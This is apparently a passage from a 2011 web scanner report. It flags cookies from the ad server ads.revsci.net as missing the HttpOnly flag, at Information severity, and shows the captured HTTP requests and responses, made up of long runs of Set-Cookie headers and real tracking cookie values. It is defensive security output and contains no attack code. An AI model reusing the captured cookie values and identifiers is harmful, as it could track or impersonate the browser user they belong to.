Set-Cookie: rsiPus_id7F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2D0P=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_M1Z_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2RcV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_fldA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_i0tL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4m8k=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ppkq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_G93Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JCjG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yHyN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_C5Uh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_8olB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kFhz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JeGp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Re8S=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pDeg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wxyS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VyjV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JsaM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_1p6o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VIa5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zc6p=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ptuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AlmC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus__Yzb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_k7NG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_dpiY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OLBq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D3J-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Tpuf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_MnS9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Bpmx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gx4y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_OGcW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4g95=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_gjH6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GCsG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_l41s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_nSTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Zd-e=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Dpzn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_AnWT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Jcjr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_wDL0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_GNkZ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Mzt2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_A76z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_pLOm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_4cFc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kaha=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ar9b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Iei_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_h03W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QYQn="MLtXrt8vtl9rIAF9m8HM9CRwtSv8pwYgsssFOu5OTeOlKAZz5+/wuXtI5aPioHhhdEjAIagkY/G8GHOoPBTZKbe4LvfbnbdkKhONXmKkgHQgdLckCXP0Ycf6bL86yMYbL1uMiqL/s6MNej7gFcLrWQkAx8c6IYdi+yDQifN3Qycz6Jj1em6Y5Eay9ZRgmRVQd4wL1CPn/dRQ4JoZ5iAZWwFtgtxpYZ2eGJoLULxN8vLRSvbSAvOi3Mra/1wX6oTWmDs4ThHYmdgsHYPtkd1lfMJC8ZS8jNp4O4oZuhx+vDf6G8BYd19mNkCBOkzH6Y5GDSLMLc63IB0="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:57:01 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

12.31. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set.

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="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"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-="MLtXrl8utl9nIAH3UpyYS5hfBI/9QmnaLO8+oQBTcj1w7zk1SBcuEp11OYV3eoEYGjpFZWOPgoNQci70eKD5Ye/TluCH1ph2OfNJJMjXr2tEwK6lT90zRjTWFir3Smdxu7Pzv7IGaJb71qrC4tVI3Snv040D4KfKVeDwv36XXJk56KbIZB9bXWfOPmlpFy/NYxQNhmbXX7VX4OufOCJaGnRnjt7od3EgCE3JFz3vU3k7mw43bPeHKuGhKee7f4PwRlAXPU22nFtYN+Qzfjq1jqlV4IJnvHjWiSaeoFFH8sW+jqA85vTE9ESWiYb8WI1yKhshWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:50:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

12.32. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set.

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=f09828 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
